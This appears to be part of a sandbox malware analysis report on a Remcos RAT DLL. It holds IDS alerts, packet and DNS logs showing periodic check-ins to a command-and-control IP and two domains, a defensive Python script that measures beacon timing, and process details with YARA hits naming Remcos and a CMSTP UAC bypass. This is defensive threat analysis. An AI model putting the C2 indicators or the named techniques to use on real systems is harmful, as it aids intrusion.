2024-10-18T12:16:41.126552+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50013 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:16:50.623194+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50014 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:16:59.110987+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50015 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:17:08.610567+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50016 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:17:17.410636+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50017 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:17:26.922102+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50018 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:17:35.424734+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50019 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:17:44.936419+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50020 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:17:53.425586+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50021 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:18:02.923601+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50022 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:18:11.425822+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50023 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:18:21.003692+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50024 | 193.233.18.18 | 4050 | TCP
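The alert table above is what a responder would turn into a beaconing signature: the same Suricata rule fires against one IP on two destination ports, with a fresh client source port each time. The script below is an added example, not part of the Joe Sandbox report and not Remcos code: it takes the 23 alert rows, transcribed as tuples, and computes per-endpoint check-in cadence and jitter, confirms the two ports alternate, and confirms every check-in arrived on a new source port. The function names, the 5-hit minimum and the 10 % jitter threshold are my own choices; the only facts are the transcribed rows.

```python
"""Beacon-cadence triage over the Remcos check-in alerts from this report.

Added example: the tuples in ALERT_ROWS are transcribed from the report's
Suricata table (SID 2032776, "ET MALWARE Remcos 3.x Unencrypted Checkin");
every row has source IP 192.168.2.4 and destination IP 193.233.18.18.
Thresholds and helper names are assumptions, not taken from the report.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev

C2_IP = "193.233.18.18"

# (timestamp, source port, destination port), transcribed from the table above
ALERT_ROWS = [
    ("2024-10-18T12:15:02.559383+0200", 49735, 4050),
    ("2024-10-18T12:15:11.097889+0200", 49737, 5140),
    ("2024-10-18T12:15:20.607977+0200", 49774, 4050),
    ("2024-10-18T12:15:29.097370+0200", 49817, 5140),
    ("2024-10-18T12:15:38.607134+0200", 49858, 4050),
    ("2024-10-18T12:15:47.106960+0200", 49907, 5140),
    ("2024-10-18T12:15:56.591358+0200", 49960, 4050),
    ("2024-10-18T12:16:05.072729+0200", 50009, 5140),
    ("2024-10-18T12:16:14.593568+0200", 50010, 4050),
    ("2024-10-18T12:16:23.135021+0200", 50011, 5140),
    ("2024-10-18T12:16:32.623415+0200", 50012, 4050),
    ("2024-10-18T12:16:41.126552+0200", 50013, 5140),
    ("2024-10-18T12:16:50.623194+0200", 50014, 4050),
    ("2024-10-18T12:16:59.110987+0200", 50015, 5140),
    ("2024-10-18T12:17:08.610567+0200", 50016, 4050),
    ("2024-10-18T12:17:17.410636+0200", 50017, 5140),
    ("2024-10-18T12:17:26.922102+0200", 50018, 4050),
    ("2024-10-18T12:17:35.424734+0200", 50019, 5140),
    ("2024-10-18T12:17:44.936419+0200", 50020, 4050),
    ("2024-10-18T12:17:53.425586+0200", 50021, 5140),
    ("2024-10-18T12:18:02.923601+0200", 50022, 4050),
    ("2024-10-18T12:18:11.425822+0200", 50023, 5140),
    ("2024-10-18T12:18:21.003692+0200", 50024, 4050),
]


def parse_ts(ts: str) -> datetime:
    """Parse the report's timestamp form; %z accepts the '+0200' offset."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def interarrival(times):
    """Median gap in seconds and jitter relative to that median for sorted times."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if not gaps:
        return None, None
    med = median(gaps)
    return med, (pstdev(gaps) / med if med else float("inf"))


def c2_endpoints(rows, dst_ip=C2_IP):
    """Distinct (ip, port) pairs the alerts were raised against."""
    return sorted({(dst_ip, dport) for _, _, dport in rows})


def cadence_by_endpoint(rows, dst_ip=C2_IP):
    """Hit count, median inter-arrival and relative jitter per (ip, port)."""
    times = defaultdict(list)
    for ts, _, dport in rows:
        times[(dst_ip, dport)].append(parse_ts(ts))
    stats = {}
    for ep, ts_list in times.items():
        med, jitter = interarrival(ts_list)
        stats[ep] = {"hits": len(ts_list), "median_gap": med, "rel_jitter": jitter}
    return stats


def overall_cadence(rows):
    """Cadence of the whole check-in stream regardless of destination port."""
    med, jitter = interarrival(parse_ts(ts) for ts, _, _ in rows)
    return {"hits": len(rows), "median_gap": med, "rel_jitter": jitter}


def looks_like_beacon(stat, min_hits=5, max_rel_jitter=0.10):
    """Assumed thresholds: enough hits and a tight, regular interval."""
    return (stat["hits"] >= min_hits and stat["median_gap"] is not None
            and stat["rel_jitter"] <= max_rel_jitter)


def alternates_ports(rows):
    """True when no two consecutive check-ins hit the same destination port."""
    ports = [dport for _, _, dport in rows]
    return len(set(ports)) > 1 and all(a != b for a, b in zip(ports, ports[1:]))


def fresh_source_port_each_time(rows):
    """True when every check-in used a source port not seen in any other row."""
    sports = [sport for _, sport, _ in rows]
    return len(sports) == len(set(sports))


if __name__ == "__main__":
    for (ip, port), st in cadence_by_endpoint(ALERT_ROWS).items():
        print(f"{ip}:{port} hits={st['hits']} median_gap={st['median_gap']:.2f}s "
              f"jitter={st['rel_jitter']:.3f} beacon={looks_like_beacon(st)}")
    ov = overall_cadence(ALERT_ROWS)
    print(f"all ports: median_gap={ov['median_gap']:.2f}s jitter={ov['rel_jitter']:.3f}")
    print("alternating ports:", alternates_ports(ALERT_ROWS))
    print("fresh source port per check-in:", fresh_source_port_each_time(ALERT_ROWS))
```

On these rows each port sees a check-in roughly every 18 s and the combined stream roughly every 9 s, with jitter well under 1 %, which is why a fixed-interval beacon heuristic catches it; the per-port split matters because a detector keyed on a single destination port would see only half the events and twice the interval.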
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 18, 2024 12:15:02.553214073 CEST | 49735 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:02.558263063 CEST | 4050 | 49735 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:02.558336020 CEST | 49735 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:02.559382915 CEST | 49735 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:02.564260006 CEST | 4050 | 49735 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:11.068687916 CEST | 4050 | 49735 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:11.068965912 CEST | 49735 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:11.069315910 CEST | 49735 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:11.074127913 CEST | 4050 | 49735 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:11.092335939 CEST | 49737 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:11.097234964 CEST | 5140 | 49737 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:11.097347975 CEST | 49737 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:11.097888947 CEST | 49737 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:11.102897882 CEST | 5140 | 49737 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:19.587183952 CEST | 5140 | 49737 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:19.588689089 CEST | 49737 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:19.588769913 CEST | 49737 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:19.593607903 CEST | 5140 | 49737 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:20.602236986 CEST | 49774 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:20.607151985 CEST | 4050 | 49774 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:20.607234001 CEST | 49774 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:20.607976913 CEST | 49774 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:20.612890959 CEST | 4050 | 49774 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:29.090404987 CEST | 4050 | 49774 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:29.090477943 CEST | 49774 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:29.090569019 CEST | 49774 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:29.091841936 CEST | 49817 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:29.095469952 CEST | 4050 | 49774 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:29.096868992 CEST | 5140 | 49817 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:29.096956015 CEST | 49817 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:29.097369909 CEST | 49817 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:29.102224112 CEST | 5140 | 49817 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:37.593373060 CEST | 5140 | 49817 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:37.593434095 CEST | 49817 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:37.593532085 CEST | 49817 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:37.598328114 CEST | 5140 | 49817 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:38.601720095 CEST | 49858 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:38.606637001 CEST | 4050 | 49858 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:38.606724024 CEST | 49858 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:38.607134104 CEST | 49858 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:38.611934900 CEST | 4050 | 49858 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:47.100434065 CEST | 4050 | 49858 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:47.100503922 CEST | 49858 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:47.100558043 CEST | 49858 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:47.101728916 CEST | 49907 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:47.105348110 CEST | 4050 | 49858 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:47.106523037 CEST | 5140 | 49907 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:47.106592894 CEST | 49907 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:47.106960058 CEST | 49907 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:47.111715078 CEST | 5140 | 49907 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:55.582130909 CEST | 5140 | 49907 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:55.582225084 CEST | 49907 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:55.582304955 CEST | 49907 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:55.587188005 CEST | 5140 | 49907 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:56.585982084 CEST | 49960 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:56.590914011 CEST | 4050 | 49960 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:15:56.591001034 CEST | 49960 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:56.591357946 CEST | 49960 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:15:56.596154928 CEST | 4050 | 49960 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:05.065956116 CEST | 4050 | 49960 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:05.066050053 CEST | 49960 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:05.066108942 CEST | 49960 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:05.067178965 CEST | 50009 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:05.070957899 CEST | 4050 | 49960 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:05.072201967 CEST | 5140 | 50009 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:05.072277069 CEST | 50009 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:05.072729111 CEST | 50009 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:05.077513933 CEST | 5140 | 50009 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:13.572762966 CEST | 5140 | 50009 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:13.572841883 CEST | 50009 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:13.572913885 CEST | 50009 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:13.577709913 CEST | 5140 | 50009 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:14.586256981 CEST | 50010 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:14.591219902 CEST | 4050 | 50010 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:14.593264103 CEST | 50010 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:14.593568087 CEST | 50010 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:14.598366022 CEST | 4050 | 50010 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:23.084474087 CEST | 4050 | 50010 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:23.084712982 CEST | 50010 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:23.117341042 CEST | 50010 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:23.123466015 CEST | 4050 | 50010 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:23.124727964 CEST | 50011 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:23.130455017 CEST | 5140 | 50011 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:23.130544901 CEST | 50011 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:23.135020971 CEST | 50011 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:23.139837980 CEST | 5140 | 50011 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:31.612761021 CEST | 5140 | 50011 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:31.614483118 CEST | 50011 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:31.614483118 CEST | 50011 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:31.619286060 CEST | 5140 | 50011 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:32.617994070 CEST | 50012 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:32.623073101 CEST | 4050 | 50012 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:32.623133898 CEST | 50012 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:32.623414993 CEST | 50012 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:32.628247976 CEST | 4050 | 50012 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:41.119478941 CEST | 4050 | 50012 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:41.119541883 CEST | 50012 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:41.119601011 CEST | 50012 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:41.120765924 CEST | 50013 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:41.124586105 CEST | 4050 | 50012 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:41.126000881 CEST | 5140 | 50013 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:41.126072884 CEST | 50013 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:41.126552105 CEST | 50013 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:41.131628990 CEST | 5140 | 50013 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:49.609514952 CEST | 5140 | 50013 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:49.614615917 CEST | 50013 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:49.614762068 CEST | 50013 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:49.619721889 CEST | 5140 | 50013 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:50.617837906 CEST | 50014 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:50.622848988 CEST | 4050 | 50014 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:50.622992992 CEST | 50014 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:50.623193979 CEST | 50014 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:50.627960920 CEST | 4050 | 50014 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:59.098603010 CEST | 4050 | 50014 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:59.100693941 CEST | 50014 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:59.100733042 CEST | 50014 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:59.101931095 CEST | 50015 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:59.105689049 CEST | 4050 | 50014 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:59.106848001 CEST | 5140 | 50015 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:16:59.110692024 CEST | 50015 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:59.110986948 CEST | 50015 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:16:59.115830898 CEST | 5140 | 50015 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:17:07.592542887 CEST | 5140 | 50015 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:17:07.593070984 CEST | 50015 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:17:07.593070984 CEST | 50015 | 5140 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:17:07.598042011 CEST | 5140 | 50015 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:17:08.602261066 CEST | 50016 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:17:08.610181093 CEST | 4050 | 50016 | 193.233.18.18 | 192.168.2.4
Oct 18, 2024 12:17:08.610255003 CEST | 50016 | 4050 | 192.168.2.4 | 193.233.18.18
Oct 18, 2024 12:17:08.610567093 CEST | 50016 | 4050 | 192.168.2.4 | 193.233.18.18
                                    Oct 18, 2024 12:17:08.618133068 CEST405050016193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:17.404012918 CEST405050016193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:17.404221058 CEST405050016193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:17.404330969 CEST500164050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:17.404330969 CEST500164050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:17.405445099 CEST500175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:17.409250021 CEST405050016193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:17.410295010 CEST514050017193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:17.410381079 CEST500175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:17.410635948 CEST500175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:17.415479898 CEST514050017193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:25.901875973 CEST514050017193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:25.901945114 CEST500175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:25.901990891 CEST500175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:25.907067060 CEST514050017193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:26.916516066 CEST500184050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:26.921716928 CEST405050018193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:26.921782970 CEST500184050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:26.922101974 CEST500184050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:26.926901102 CEST405050018193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:35.403600931 CEST405050018193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:35.403731108 CEST500184050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:35.418040991 CEST500184050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:35.419444084 CEST500195140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:35.423122883 CEST405050018193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:35.424388885 CEST514050019193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:35.424469948 CEST500195140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:35.424734116 CEST500195140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:35.429631948 CEST514050019193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:43.914722919 CEST514050019193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:43.915101051 CEST500195140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:43.915149927 CEST500195140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:43.920150042 CEST514050019193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:44.931226015 CEST500204050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:44.936105967 CEST405050020193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:44.936175108 CEST500204050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:44.936419010 CEST500204050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:44.941219091 CEST405050020193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:53.415916920 CEST405050020193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:53.419328928 CEST500204050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:53.419329882 CEST500204050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:53.420334101 CEST500215140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:53.424460888 CEST405050020193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:53.425164938 CEST514050021193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:53.425267935 CEST500215140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:53.425585985 CEST500215140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:53.430438042 CEST514050021193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:01.910669088 CEST514050021193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:01.910856009 CEST500215140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:01.910856009 CEST500215140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:01.915785074 CEST514050021193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:02.916215897 CEST500224050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:02.921124935 CEST405050022193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:02.923278093 CEST500224050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:02.923600912 CEST500224050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:02.928633928 CEST405050022193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:11.419096947 CEST405050022193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:11.419197083 CEST500224050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:11.419328928 CEST500224050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:11.420262098 CEST500235140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:11.424334049 CEST405050022193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:11.425265074 CEST514050023193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:11.425365925 CEST500235140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:11.425822020 CEST500235140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:11.430813074 CEST514050023193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:19.985167027 CEST514050023193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:19.985475063 CEST500235140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:19.985534906 CEST500235140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:19.990514994 CEST514050023193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:20.993756056 CEST500244050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:20.999509096 CEST405050024193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:20.999735117 CEST500244050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:21.003691912 CEST500244050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:21.008743048 CEST405050024193.233.18.18192.168.2.4
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Oct 18, 2024 12:15:02.431050062 CEST | 61010 | 53 | 192.168.2.4 | 1.1.1.1
                                    Oct 18, 2024 12:15:02.487327099 CEST | 53 | 61010 | 1.1.1.1 | 192.168.2.4
                                    Oct 18, 2024 12:15:11.070998907 CEST | 51562 | 53 | 192.168.2.4 | 1.1.1.1
                                    Oct 18, 2024 12:15:11.090673923 CEST | 53 | 51562 | 1.1.1.1 | 192.168.2.4
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Oct 18, 2024 12:15:02.431050062 CEST | 192.168.2.4 | 1.1.1.1 | 0x57a | Standard query (0) | goatratedman.com | A (IP address) | IN (0x0001) | false
                                    Oct 18, 2024 12:15:11.070998907 CEST | 192.168.2.4 | 1.1.1.1 | 0x9c5a | Standard query (0) | extendedbreakfast.com | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Oct 18, 2024 12:15:02.487327099 CEST | 1.1.1.1 | 192.168.2.4 | 0x57a | No error (0) | goatratedman.com | | 193.233.18.18 | A (IP address) | IN (0x0001) | false
                                    Oct 18, 2024 12:15:11.090673923 CEST | 1.1.1.1 | 192.168.2.4 | 0x9c5a | No error (0) | extendedbreakfast.com | | 193.233.18.18 | A (IP address) | IN (0x0001) | false


                                    Target ID:0
                                    Start time:06:14:14
                                    Start date:18/10/2024
                                    Path:C:\Windows\System32\loaddll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll"
                                    Imagebase:0x7c0000
                                    File size:126'464 bytes
                                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:true

                                    Target ID:1
                                    Start time:06:14:14
                                    Start date:18/10/2024
                                    Path:C:\Windows\System32\conhost.exe
